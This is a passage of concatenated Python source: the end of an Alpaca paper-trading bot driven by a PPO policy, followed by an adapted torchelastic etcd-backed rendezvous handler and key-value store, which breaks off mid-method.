time.sleep(60)
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while(not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
def trade(self):
state = self.get_state()
with torch.no_grad():
s_tensor = torch.as_tensor((state,), device=device)
a_tensor = act(s_tensor)
action = a_tensor.detach().cpu().numpy()[0] # not need detach(), because with torch.no_grad() outside
action = (action * 100).astype(int)
if self.turb_bool == 0:
min_action = 10
for index in np.where(action < -min_action)[0]: # sell:
sell_num_shares = min(self.stocks[index], -action[index])
qty = abs(int(sell_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, self.stockUniverse[index], 'sell', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
for index in np.where(action > min_action)[0]: # buy:
if self.cash < 0:
tmp_cash = 0
else:
tmp_cash = self.cash
buy_num_shares = min(tmp_cash // self.price[index], abs(int(action[index])))
qty = abs(int(buy_num_shares))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, self.stockUniverse[index], 'buy', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
else: # sell all when turbulence
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
tSubmitOrder = threading.Thread(target=self.submitOrder(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
def get_state(self):
AE = AlpacaEngineer(api=self.alpaca)
df = self.alpaca.get_barset(self.stockUniverse, '1Min', limit=1000).df
df = AE.add_technical_indicators(df, self.stockUniverse)
time = df.index
first_time = True
for stock in self.stockUniverse:
if first_time == True:
closes = df[(stock,'close')].values
ary = np.vstack([time,closes]).T
tmp_df = pd.DataFrame(ary, columns = ['date','close'])
tmp_df['tic'] = stock
first_time = False
else:
closes = df[(stock,'close')]
ary = np.vstack([time,closes]).T
tmp_tmp_df = pd.DataFrame(ary, columns = ['date','close'])
tmp_tmp_df['tic'] = stock
tmp_df = tmp_df.append(tmp_tmp_df)
tmp_df = AE.add_turbulence(tmp_df)
turbulence_ary = tmp_df[tmp_df.tic==self.stockUniverse[0]]['turbulence'].values
turbulence_bool = (turbulence_ary > int(1e4)).astype(np.float32)
turbulence_ary = (turbulence_ary * 2 ** -7).clip((int(1e4)) * 2)
price_array, tech_array = AE.df_to_ary(df, self.stockUniverse)
price = price_array[-1]
self.price = price
tech = tech_array[-1]
turb = turbulence_ary[-1]
turb_bool = turbulence_bool[-1]
self.turb_bool = turb_bool
positions = self.alpaca.list_positions()
stocks = [0] * 5
for position in positions:
ind = self.stockUniverse.index(position.symbol)
stocks[ind] = ( abs(int(float(position.qty))))
self.stocks = stocks
stocks = np.asarray(stocks, dtype = float)
cash = float(self.alpaca.get_account().cash)
self.cash = cash
state = np.hstack((max(cash, 1e4) * (2 ** -17),
price * (2 ** -9),
turb,
turb_bool,
stocks * (2 ** -5),
tech * (2 **-9),
)).astype(np.float32)
return state
def submitOrder(self, qty, stock, side, resp):
if(qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through.")
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
drl = PPO_PaperTrading()
drl.run()
|
custom_rendezvous.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import datetime
import json
import logging
import random
import sys
import threading
import time
from base64 import b64decode, b64encode
from typing import Optional
import etcd
from torch.distributed import Store, TCPStore, register_rendezvous_handler
from torchelastic.rendezvous import (
RendezvousClosedException,
RendezvousHandler,
RendezvousNonRetryableError,
RendezvousTimeoutException,
)
_log_fmt = logging.Formatter("%(levelname)s %(asctime)s %(message)s")
_log_handler = logging.StreamHandler(sys.stderr)
_log_handler.setFormatter(_log_fmt)
log = logging.getLogger(__name__)
log.propagate = False
log.setLevel(logging.INFO)
log.addHandler(_log_handler)
# Retryable failure exception means the we were too late to make
# a desired state transition (e.g. because of a race condition),
# and should now restart from the beginning.
# A small delay is recommended to avoid spamming Etcd.
class CustomRendezvousRetryableFailure(Exception):
pass
# Similar to retryable failure, but the new state we observed suggests we
# can re-try immediately, i.e. without a need for "safety delay".
class CustomRendezvousRetryImmediately(Exception):
pass
# Default overall timeout for rendezvous barrier.
CONST_DEFAULT_OVERALL_TIMEOUT = 600
# Additional waiting amount after reaching num_min_workers,
# for the case rendezvous is elastic (min != max):
CONST_DEFAULT_LAST_CALL_TIMEOUT = 30
# Various constants used internally in EtcdRendezvous
CONST_ETCD_SETUP_TTL = 5
CONST_ETCD_FROZEN_TTL = 10
CONST_ETCD_JOINABLE_EPHEMERAL_TTL = 10
# Ephemeral node TTL for worker's keep-alive key:
CONST_WORKER_KEEPALIVE_TTL = 10
# TTL for the ephemeral run_id-specific directory. All rendezvous state data
# for a specific run_id (job instance) is contained within directory.
# Its only role is to clean-up rendezvous data from old runs (for the case when
# etcd server is persistent), and has no affect on correctnes, but should be
# larger than any timeouts that a worker process is expected to survive:
CONST_RUNID_SUBROOT_TTL = 7200 # 2 hours
# Delay (sleep) for a small random amount to reduce CAS failures.
# This does not affect correctness, but will reduce requests to etcd server.
def cas_delay():
time.sleep(random.uniform(0, 0.1))
class CustomRendezvousHandler(RendezvousHandler):
"""
Implements a :py:class:`torchelastic.rendezvous.RendezvousHandler`
interface backed by
:py:class:`torchelastic.rendezvous.etcd_rendezvous.EtcdRendezvous`.
Torchelastic uses a URL to configure the type of rendezvous to use and
to pass implementation specific configurations to the rendezvous module.
The basic etcd rendezvous configuration URL looks like the following
::
etcd://<etcd_address>:<port>/<job_id>?min_workers=<min_workers>&max_workers=<max_workers> # noqa W605
-- example --
etcd://localhost:2379/1234?min_workers=1&max_workers=3
The URL above is interpreted as follows:
1. Use the rendezvous handler that is registered with the ``etcd``
scheme
2. The ``etcd`` endpoint to use is ``localhost:2379``
3. ``job_id == 1234`` is used as the prefix in etcd (this allows one to
share a common etcd server for multiple jobs so long as the
``job_ids`` are guaranteed to be unique). Note that the job id can be
any string (e.g. does not need to be a number) as long as it is
unique.
4. ``min_workers=1`` and ``max_workers=3`` specifies a range for
membership size - torchelastic starts running the job as long as the
cluster size is greater than or equal to ``min_workers`` and admits
up to ``max_workers`` into the cluster.
Below are a full list of the parameters that can be passed to etcd
rendezvous:
+--------------------------------------------+--------------------------+
| Parameter | Description |
+============================================+==========================+
| min_workers | minimum number of |
| | workers for the |
| | rendezvous to be valid |
+--------------------------------------------+--------------------------+
| max_workers | maximum number of |
| | workers to admit |
+--------------------------------------------+--------------------------+
| timeout | total timeout within |
| | which next_rendezvous is |
| | expected to succeed |
| | (default 600s) |
+--------------------------------------------+--------------------------+
| last_call_timeout | additional wait amount |
| | (“last call”) after min |
| | number of workers has |
| | been reached (defaults |
| | to 30s) |
+--------------------------------------------+--------------------------+
| etcd_prefix | path prefix (from etcd |
| | root), inside which all |
| | etcd nodes will be |
| | created (defaults to |
| | ``/torchelastic/p2p``) |
+--------------------------------------------+--------------------------+
"""
def __init__(self, rdzv_impl):
self._rdzv_impl = rdzv_impl
def __del__(self):
# TODO: look into using weakref here instead.
del self._rdzv_impl
def next_rendezvous(self):
rdzv_version, rank, world_size = self._rdzv_impl.rendezvous_barrier()
log.info("Creating EtcdStore as the c10d::Store implementation")
store = self._rdzv_impl.setup_kv_store(rdzv_version)
return store, rank, world_size
def is_closed(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
return state["status"] == "closed"
except etcd.EtcdKeyNotFound:
# No rendezvous state, so it cannot be closed.
return False
def set_closed(self):
self._rdzv_impl.set_closed()
def num_nodes_waiting(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
if state["status"] == "final":
return state["num_workers_waiting"]
except etcd.EtcdKeyNotFound:
pass
return 0
def get_run_id(self) -> str:
return self._rdzv_impl._run_id
# TODO: we should probably handle a few additional errors,
# like EtcdLeaderElectionInProgress and EtcdWatcherCleared. These are
# only relevant for multi-node Etcd ensemble. A simple retry would work,
# but is verbose to add everywhere. Consider wrapping the client calls
# into auto-retry for these errors?
#
class CustomRendezvous(object):
"""
A rendezvous implementation that uses `etcd <https://etcd.io/>`__ as
the backend store.
"""
def __init__(
self,
endpoints,
prefix,
run_id,
num_min_workers,
num_max_workers,
timeout,
last_call_timeout,
**kwargs,
):
self._prefix = prefix
self._run_id = run_id
self._num_min_workers = num_min_workers
self._num_max_workers = num_max_workers
self._timeout = timeout
self._last_call_timeout = last_call_timeout
# For cleaning up TTL refresher threads (for ephemeral keys)
self._lease_run_id_stop = None
self._lease_this_rank_stop = None
if not self._prefix.endswith("/"):
self._prefix += "/"
self.client = etcd.Client(host=endpoints, allow_reconnect=True, **kwargs)
log.info("Etcd machines: " + str(self.client.machines))
# Setup a permanent prefix dir, if didn't exist
if self._prefix != "/":
self.create_path_if_not_exists(self._prefix)
# Lease a "sub-root" node specific to this job instance (run_id)
self.create_path_if_not_exists(self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL)
self._lease_run_id_stop = self.setup_lease_renewal(
self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL
)
# Subdir for all rendezvous work
self.create_path_if_not_exists(self.get_path("/rdzv"))
# Create a rendezvous version counter, if doesn't exist
try:
self.client.write(
key=self.get_path("/rdzv/version_counter"), value="0", prevExist=False
)
except etcd.EtcdAlreadyExist:
pass
def __del__(self):
# TODO: look into using weakref here instead.
if self._lease_run_id_stop is not None:
self._lease_run_id_stop.set()
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
def rendezvous_barrier(self):
"""
Main entry point for next rendezvous.
This method is blocking until rendezvous succeeds or a timeout occurs.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousTimeoutException - timeout waiting for rendezvous
RendezvousNonRetryableError - other persistent errors that
render the rendezvous non-retryable
RendezvousClosedException - rendezvous is or was closed while
waiting
"""
self._rendezvous_deadline = time.time() + self._timeout
while True:
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
log.info("Attempting to join next rendezvous")
try:
# Dis-own our lease in the previous rendezvous, if exists
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
return self.init_phase()
except CustomRendezvousRetryImmediately:
# The type of failure suggests we can retry without delay
pass
except CustomRendezvousRetryableFailure:
# In case of retryable failure, wait a small delay
# to avoid spamming etcd
time.sleep(1)
except RendezvousTimeoutException:
log.info("Rendezvous timeout occured in EtcdRendezvousHandler")
raise
except RendezvousClosedException:
log.info(
f"Rendezvous for run_id={self._run_id} was observed to be closed"
)
raise
except RendezvousNonRetryableError:
raise
except Exception as e:
# In case of a general exception, wait a small delay
# to avoid spamming etcd
# FIXME: there are a few things that fall under this like
# etcd.EtcdKeyNotFound, etc, which could be handled more explicitly.
log.info("Rendezvous attempt failed, will retry. Reason: " + str(e))
time.sleep(1)
def init_phase(self):
"""
Initially, the rendezvous state is expected to be one of:
1. empty (non-existent) - in this case we try to create a new one.
2. joinable - we try to join it.
3. final - we announce ourselves as waiting, and go into monitoring mode
Any other state is considered transitional, and will be retried after
a short delay.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousClosedException - current rendezvous was/is closed
EtcdRendezvousRetryableFailure - observed some intermediate
state, which is best handled by retrying later
"""
try:
active_version = self.try_create_rendezvous()
state = json.loads(active_version.value)
log.info("New rendezvous state created: " + str(state))
except etcd.EtcdAlreadyExist:
active_version, state = self.get_rdzv_state()
# Note: it is possible for above query to fail (etcd.EtcdKeyNotFound),
# but this is ok for us - just means we'll restart from beginning.
log.info("Observed existing rendezvous state: " + str(state))
if state["status"] == "closed":
raise RendezvousClosedException()
if state["status"] == "joinable":
return self.join_phase(state["version"])
if state["status"] == "final":
self.handle_existing_rendezvous(state["version"])
raise CustomRendezvousRetryImmediately()
self.try_wait_for_state_change(etcd_index=active_version.etcd_index + 1)
raise CustomRendezvousRetryableFailure()
def join_phase(self, expected_version):
"""
We observed a rendezvous state in 'joinable' state, and attempt to join this
particular version, and then wait for all other peers to join.
"""
# Failure to join will propagate an exception, causing a re-entry.
active_version, this_rank = self.join_rendezvous(expected_version)
state = json.loads(active_version.value)
log.info(
"Joined rendezvous version {} as rank {}. Full state: {}".format(
state["version"], this_rank, state
)
)
# If this worker was first to reach num_min_workers requirement,
# and rendezvous is still joinable (therefore it is elastic),
# then this worker will be repsonsible for waiting out the "last call"
# timeout and closing (i.e. transitioning to 'frozen') the rendezvous
# afterwards.
# As a safety against a potential failure of this worker (during the
# last call timeout), the rendezvous state is made ephemeral
# when min_num_workers is reached.
if this_rank == self._num_min_workers - 1 and state["status"] == "joinable":
log.info("Rank {} is responsible for join last call.".format(this_rank))
last_call_deadline = time.time() + self._last_call_timeout
self.handle_join_last_call(expected_version, last_call_deadline)
log.info("Rank {} finished join last call.".format(this_rank))
# Wait for rendezvous state to be frozen, which means a fixed set of peers
log.info("Waiting for remaining peers.")
active_version = self.wait_for_peers(expected_version)
state = json.loads(active_version.value)
assert (
state["version"] == expected_version
), "Logic error: failed to observe version mismatch"
return self.confirm_phase(expected_version, this_rank)
def confirm_phase(self, expected_version, this_rank):
"""
Once the rendezvous state trainsitions from 'joinable' to 'frozen',
we have every participant confirm their membership and setup per-member
keep-alive TTL keys, and then wait for all other participants to confirm,
which would then successfully conclude this rendezvous.
"""
log.info("All peers arrived. Confirming membership.")
self.confirm_membership(expected_version, this_rank)
log.info("Waiting for confirmations from all peers.")
active_version = self.wait_for_final(expected_version)
state = json.loads(active_version.value)
log.info(
"Rendezvous version {} is complete. Final state: {}".format(
state["version"], state
)
)
# Rendezvous version number; our rank in it; world size
return state["version"], this_rank, len(state["participants"])
def handle_existing_rendezvous(self, expected_version):
"""
Handle the case when there's an existing (state 'final) rendezvous already
in place, and we have to announce ourselves waiting, and wait until
the next rendezvous opportunity.
"""
# If state is 'final' -> increment num_workers_waiting
# Then, observe state changes:
# 1. if it's no longer final -> bail out and re-try
# 2. if keep alives are missing, destroy it and bail out.
active_state = self.announce_self_waiting(expected_version)
log.info(
"Added self to waiting list. Rendezvous full state: {}".format(
active_state.value
)
)
self.wait_for_rendezvous_to_free(expected_version)
log.info("Previously existing rendezvous state changed. Will re-try joining.")
def try_create_rendezvous(self):
"""
Create new rendezvous state or raise an exception that indicates
an unexpected state (e.g. already exists)
Raises:
RendezvousNonRetryableError - on unexpected state
"""
# Initially active_version is ephemeral - this is to handle the
# possibility that might fail to complete the setup transaction,
# i.e. the transition "setup" -> "joinable".
active_version = self.client.write(
key=self.get_path("/rdzv/active_version"),
value=json.dumps({"status": "setup"}),
prevExist=False,
ttl=CONST_ETCD_SETUP_TTL,
)
try:
version_counter = self.client.get(self.get_path("/rdzv/version_counter"))
version_counter.value = str(int(version_counter.value) + 1)
self.client.update(version_counter)
except (etcd.EtcdKeyNotFound, etcd.EtcdCompareFailed):
raise RendezvousNonRetryableError(
"Unexpected state of EtcdRendezvousHandler, worker needs to die."
)
# Any failure below results in declaring a retryable rendezvous failure.
# The ephemeral /rdzv/active_version will expire and someone can then
# re-try the setup process.
# Create directory node for participant data
self.client.write(
key=self.get_path("/rdzv/v_{}".format(version_counter.value)),
value=None,
dir=True,
prevExist=False,
)
# Publish rendezvous version and signal it is ready-to-be-joined.
# If rendezvous was set closed just before this, a retry will happen,
# where the closed condition will be handled.
return self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(
{
"status": "joinable",
"version": version_counter.value,
"participants": [],
}
),
prev_value=active_version.value,
)
def join_rendezvous(self, expected_version):
"""
Helper method for the join phase.
"""
# Use compare-and-swap to add self to rendezvous state:
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "joinable":
raise CustomRendezvousRetryableFailure(
"Rendezvous state became non-joinable before we could join. "
"Must join next one."
)
if state["version"] != expected_version:
raise CustomRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
assert (
len(state["participants"]) < self._num_max_workers
), "Logic error: joinable rendezvous should always have space left"
this_rank = len(state["participants"])
state["participants"].append(this_rank)
# When reaching min workers, or changing state to frozen, we'll set
# the active_version node to be ephemeral.
if len(state["participants"]) == self._num_max_workers:
state["status"] = "frozen"
state["keep_alives"] = []
set_ttl = CONST_ETCD_FROZEN_TTL
elif len(state["participants"]) >= self._num_min_workers:
set_ttl = CONST_ETCD_JOINABLE_EPHEMERAL_TTL
else:
set_ttl = None
try:
# Compare-and-swap.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=set_ttl,
)
# We succeeded joining.
return active_version, this_rank
except etcd.EtcdCompareFailed:
log.info("Join rendezvous CAS unsuccessful, retrying")
def wait_for_peers(self, expected_version):
"""
Helper method for the join phase.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Success, all peers arrived.
return active_version
elif state["status"] == "joinable" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise CustomRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def confirm_membership(self, expected_version, this_rank):
"""
Helper method for the confirm phase
"""
# Compare-and-swap loop
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "frozen":
raise CustomRendezvousRetryImmediately(
"Rendezvous no longer frozen, before we confirmed. "
"Must join next one"
)
if state["version"] != expected_version:
raise CustomRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
this_lease_key = self.get_path(
"/rdzv/v_{}/rank_{}".format(expected_version, this_rank)
)
self.client.set(this_lease_key, value=None, ttl=CONST_WORKER_KEEPALIVE_TTL)
state["keep_alives"].append(this_lease_key)
if len(state["keep_alives"]) == len(state["participants"]):
# Everyone confirmed (this rank is last to do so)
state["status"] = "final"
state["num_workers_waiting"] = 0
finalize = True
else:
finalize = False
try:
# Compare-and-swap. If new state is still frozen, keep it ephemeral.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=None if finalize else CONST_ETCD_FROZEN_TTL,
)
self._lease_this_rank_stop = self.setup_lease_renewal(
this_lease_key, ttl=CONST_WORKER_KEEPALIVE_TTL
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Confirm membership CAS unsuccessful, retrying")
def wait_for_final(self, expected_version):
"""
Helper method for the confirm phase
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "final" and state["version"] == expected_version:
# Succcess. This rendezvous is final, and we accept it.
return active_version
elif state["status"] == "frozen" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise CustomRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def announce_self_waiting(self, expected_version):
"""
Announce this worker is waiting (via num_workers_waiting counter) to join next
rendezvous, but only if state and version match.
"""
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "final" or state["version"] != expected_version:
raise CustomRendezvousRetryImmediately()
# Increment counter to signal an additional waiting worker.
state["num_workers_waiting"] += 1
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Announce self as waiting CAS unsuccessful, retrying")
def wait_for_rendezvous_to_free(self, expected_version):
"""
When there's an existing valid rendezvous in state 'final', we have to
wait until the next opportunity to join.
Such opportunity may come from:
1. rendezvous state changed by someone else, in which case we unblock and retry.
2. rendezvous becomes invalid because at least one member failed to renew their
leased keep_alive node. We detect this, and destroy the rendezvous.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] != "final" or state["version"] != expected_version:
return
# Check if current rendezvous state is valid, in the sense that all
# its members are alive (renewing their lease).
# If not, try destroy this rendezvous, so a new one can be created.
alive_members = self.client.get(
self.get_path("/rdzv/v_{version}".format(version=expected_version))
)
keep_alive_keys = [ch.key for ch in alive_members.children]
for key in state["keep_alives"]:
if key not in keep_alive_keys:
# This participant didn't renew their lease. We'll declare this
# rendezvous version as dead (but only if it hadn't changed)
log.info("Keep-alive key {} is not renewed.".format(key))
log.info(
"Rendevous version {} is incomplete. ".format(expected_version)
)
log.info("Attempting to destroy it.")
# Compare-and-delete operation. Throws if compare failed,
# which means rendezvous was already destroyed/re-created/closed,
# and we can try to re-enter the barrier.
self.client.delete(
key=self.get_path("/rdzv/active_version"),
prevValue=active_version.value,
)
log.info(
"Destroyed rendezvous version {} successfully.".format(
expected_version
)
)
# We can return (and retry) immediately
return
# Existing rendezvous seems valid, no reason to destroy it.
# We just have to wait until something changes and re-check.
try:
overall_timeout = (
max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
)
self.client.watch(
key=self.get_path("/rdzv"),
index=active_version.etcd_index + 1,
recursive=True,
timeout=overall_timeout,
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
active_version, state = self.get_rdzv_state()
def handle_join_last_call(self, expected_version, deadline):
"""
After we reach min number of workers, one particular worker takes on the
responsibility of waiting an additional timeout before closing the join window.
If the worker responsible for this fails, the rendezvous will be destroyed due
to expiring TTL, and the other participants will re-rendezvous.
Here we expect to see state <joinable, expected_version>
Exit gracefully if either:
1. state becomes <frozen, expected_version>
2. timeout happens (reaching deadline), in which case
we try the tranisiton to <frozen, expected_version>
Exit with exception otherwise.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Worker set became frozen before last-call timeout. This is possible
# when num_max_workers is reached before the tiemout.
return
if state["status"] != "joinable" or state["version"] != expected_version:
raise CustomRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
# If timeout occurred, attempt a state transition (joinable -> frozen)
if time.time() >= deadline:
state["status"] = "frozen"
state["keep_alives"] = []
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=CONST_ETCD_FROZEN_TTL,
)
# We successfully made this rendezvous frozen.
return
except etcd.EtcdCompareFailed:
log.info("Join last-call transition CAS unsuccessful. Will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
continue
# Timeout did not occur, so we must refresh TTL, and wait for
# further changes. Note: we only want TTL to be refreshed if
# state is still joinable, hence we use CAS for that here,
# even though we don't change any of the data.
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=active_version.value,
prev_value=active_version.value,
ttl=CONST_ETCD_JOINABLE_EPHEMERAL_TTL,
)
# Minimize "oversleeping":
timeout = min(
CONST_ETCD_JOINABLE_EPHEMERAL_TTL / 2,
deadline - time.time() + 1.0, # Oversleeping by 1s is ok.
)
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1, timeout=timeout
)
except etcd.EtcdCompareFailed:
log.info("Join last-call TTL refresh CAS unsuccessful, will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
def set_closed(self):
"""
Mark rendezvous 'closed' for current run_id, which is used to signal other
participants to not attempt to perform (re-)rendezvous. This is useful
when one of the workers decides the job is complete.
"""
while True:
active_version, state = self.get_rdzv_state()
if state["status"] == "closed":
# Already closed by someone else.
return
state["status"] = "closed"
try:
self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Set closed CAS unsuccessful, retrying")
cas_delay()
def get_rdzv_state(self):
active_version = self.client.get(key=self.get_path("/rdzv/active_version"))
return active_version, json.loads(active_version.value)
def try_wait_for_state_change(self, etcd_index, timeout=None):
# Don't sleep past the overall deadline (at least more than by 1s)
overall_timeout = max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
timeout = overall_timeout if timeout is None else min(timeout, overall_timeout)
try:
self.client.watch(
self.get_path("/rdzv/active_version"), index=etcd_index, timeout=timeout
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
# Unfortunately, we have to do another fetch in order to get last etcd_index.
return self.get_rdzv_state()
def get_path(self, path):
if not path.startswith("/"):
path = "/" + path
return "{prefix}run_{run_id}{path}".format(
prefix=self._prefix, run_id=self._run_id, path=path
)
def create_path_if_not_exists(self, full_path, ttl=None):
try:
self.client.write(
key=full_path, value=None, dir=True, prevExist=False, ttl=ttl
)
except etcd.EtcdAlreadyExist:
pass
def setup_lease_renewal(self, full_path, ttl):
# NOTE: For ephemeral key TTL renewal (~lease) to work correctly,
# make sure you don't call any long-blocking methods that do not
# release the Python's GIL! An example of this is calling a pybind11
# extension function that is blocking / long-running, but is not
# doing a scoped release of the GIL.
def lease_worker(client, path, ttl, stop_event):
while True:
try:
client.refresh(path, ttl=ttl)
except etcd.EtcdKeyNotFound:
break
if stop_event.wait(timeout=ttl / 2):
break
lease_stop_event = threading.Event()
lease_thread = threading.Thread(
target=lease_worker, args=(self.client, full_path, ttl, lease_stop_event)
)
lease_thread.daemon = True
lease_thread.start()
return lease_stop_event
def store_extra_data(self, rdzv_version, key, value):
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
try:
# If first time we are storing anything:
extra_data = self.client.write(
key=node, value=json.dumps({key: value}), prevExist=False
)
return
except etcd.EtcdAlreadyExist:
pass
# CAS loop, to make sure we don't lose concurrent stores.
while True:
# We never delete extra_data. Failure here should be fatal, no special handling.
extra_data = self.client.get(node)
new_extra_data_value = json.loads(extra_data.value)
new_extra_data_value[key] = value
try:
extra_data = self.client.test_and_set(
key=node,
value=json.dumps(new_extra_data_value),
prev_value=extra_data.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Store extra_data CAS unsuccessful, retrying")
time.sleep(0.1)
def load_extra_data(self, rdzv_version, key, timeout=None):
# 'extra_data' node itself, and the directory it is located in:
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
node_dir = self.get_path("/rdzv/v_{}".format(rdzv_version))
# TODO: implement timeout
# https://github.com/pytorch/elastic/issues/12
while True:
# Combined wait for the node itself, and the key inside it.
root = self.client.get(node_dir)
# Find the extra_data node, if it exists
extra_data = [n for n in root.children if n.key == node]
assert len(extra_data) <= 1
# Node for extra_data exists, check the desired key inside it.
if len(extra_data) == 1:
extra_data_dict = json.loads(extra_data[0].value)
if key in extra_data_dict:
return extra_data_dict[key]
# The 'extra_data' node doesn't exist, or they key isn't published yet.
# Wait for interesting events on the extra_data node and retry.
try:
self.client.watch(node, index=root.etcd_index + 1)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
def setup_kv_store(self, rdzv_version):
store_path = self.get_path(f"/rdzv/v_{rdzv_version}/kv")
self.create_path_if_not_exists(store_path)
return CustomStore(etcd_client=self.client, etcd_store_prefix=store_path)
# pyre-fixme[11]: Annotation `Store` is not defined as a type.
class CustomStore(Store):
"""
Implements a c10 Store interface by piggybacking on the rendezvous etcd
instance. This is the store object returned by ``EtcdRendezvous``
"""
def __init__(
self,
etcd_client,
etcd_store_prefix,
timeout: Optional[datetime.timedelta] = None,
):
super().__init__() # required for pybind trampoline.
self.client = etcd_client
self.prefix = etcd_store_prefix
# Default timeout same as in c10d/Store.hpp
self.timeout = (
timeout if timeout is not None else datetime.timedelta(seconds=300)
)
if not self.prefix.endswith("/"):
self.prefix += "/"
def set(self, key, value):
"""
Write a key/value pair into ``EtcdStore``.
Both key and value may be either Python ``str`` or ``bytes``.
"""
self.client.set(key=self.prefix + self._encode(key), value=self._encode(value))
def get(self, key) -> bytes:
"""
Get a value by key, possibly doing a blocking wait.
If key is not immediately present, will do a blocking wait
for at most ``timeout`` duration or until the key is published.
Returns:
value ``(bytes)``
Raises:
LookupError - If key still not published after timeout
"""
b64_key = self.prefix + self._encode(key)
kvs = self._try_wait_get([b64_key])
if kvs is None:
raise LookupError(f"Key {key} not found in EtcdStore")
return self._decode(kvs[b64_key])
def add(self, key, num: int) -> int:
"""
Atomically increment a value by an integer amount. The integer is
represented as a string using base 10. If key is not present,
a default value of ``0`` will be assumed.
Returns:
the new (incremented) value
"""
b64_key = self._encode(key)
# c10d Store assumes value is an integer represented as a decimal string
try:
# Assume default value "0", if this key didn't yet:
node = self.client.write(
key=self.prefix + b64_key,
value=self._encode(str(num)), # i.e. 0 + num
prevExist=False,
)
return int(self._decode(node.value))
except etcd.EtcdAlreadyExist:
pass
while True:
# Note: c10d Store does not have a method to delete keys, so we
# can be sure it's still there.
node = self.client.get(key=self.prefix + b64_key)
new_value = self._encode(str(int(self._decode(node.value)) + num))
try:
node = self.client.test_and_set(
key=node.key, value=new_value, prev_value=node.value
)
return int(self._decode(node.value))
except etcd.EtcdCompareFailed:
cas_delay()
def wait(self, keys, override_timeout: Optional[datetime.timedelta] = None):
"""
Waits until all of the keys are published, or until timeout.
Raises:
LookupError - if timeout occurs
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
